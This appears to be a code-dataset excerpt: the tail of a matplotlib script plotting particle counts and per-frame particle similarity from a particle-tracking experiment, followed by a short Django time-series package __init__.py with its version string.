ax.set_xlim([-xylim, xylim]) ax.set_xticks(xyticks) ax.set_ylabel(r'$N_{p} \: (\#)$') ax.set_ylim([0, 185]) ax.set_yticks([0, 50, 100, 150]) ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-idpt-spct_num-particles_and_cm.png') if show_plots: plt.show() plt.close() # ---------------------------------------------------------------------------------------------------------------------- # 6. AVERAGE PARTICLE-TO-PARTICLE SIMILARITY PER-FRAME plot_average_particle_similarity = False if plot_average_particle_similarity: # setup save_plots = True xylim = 37.25 xyticks = [-30, -15, 0, 15, 30] ms = 3 # read dataframe fp = join(base_dir, 'average-particle-similarity/' 'average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx') dfsim = pd.read_excel(fp) # plot fig, ax = plt.subplots() ax.plot(dfsim.z_corr, dfsim.sim, '-o', ms=ms) ax.set_xlabel(r'$z \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(xyticks) ax.set_ylabel(r'$S (p_{i}, p_{N})$') ax.set_ylim([0.49, 1.01]) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/average-particle-to-particle-similarity.png') plt.show() plt.close() j = 1 print("Analysis completed without errors.")
2.296875
2
django_timeseries_tables/__init__.py
androbwebb/django-timeseries-tables
0
12789950
from .fields import NormalField, ForeignKey # noqa:F401 from .models import TimeSeriesModel # noqa:F401 __version__ = '0.1.3'
1.234375
1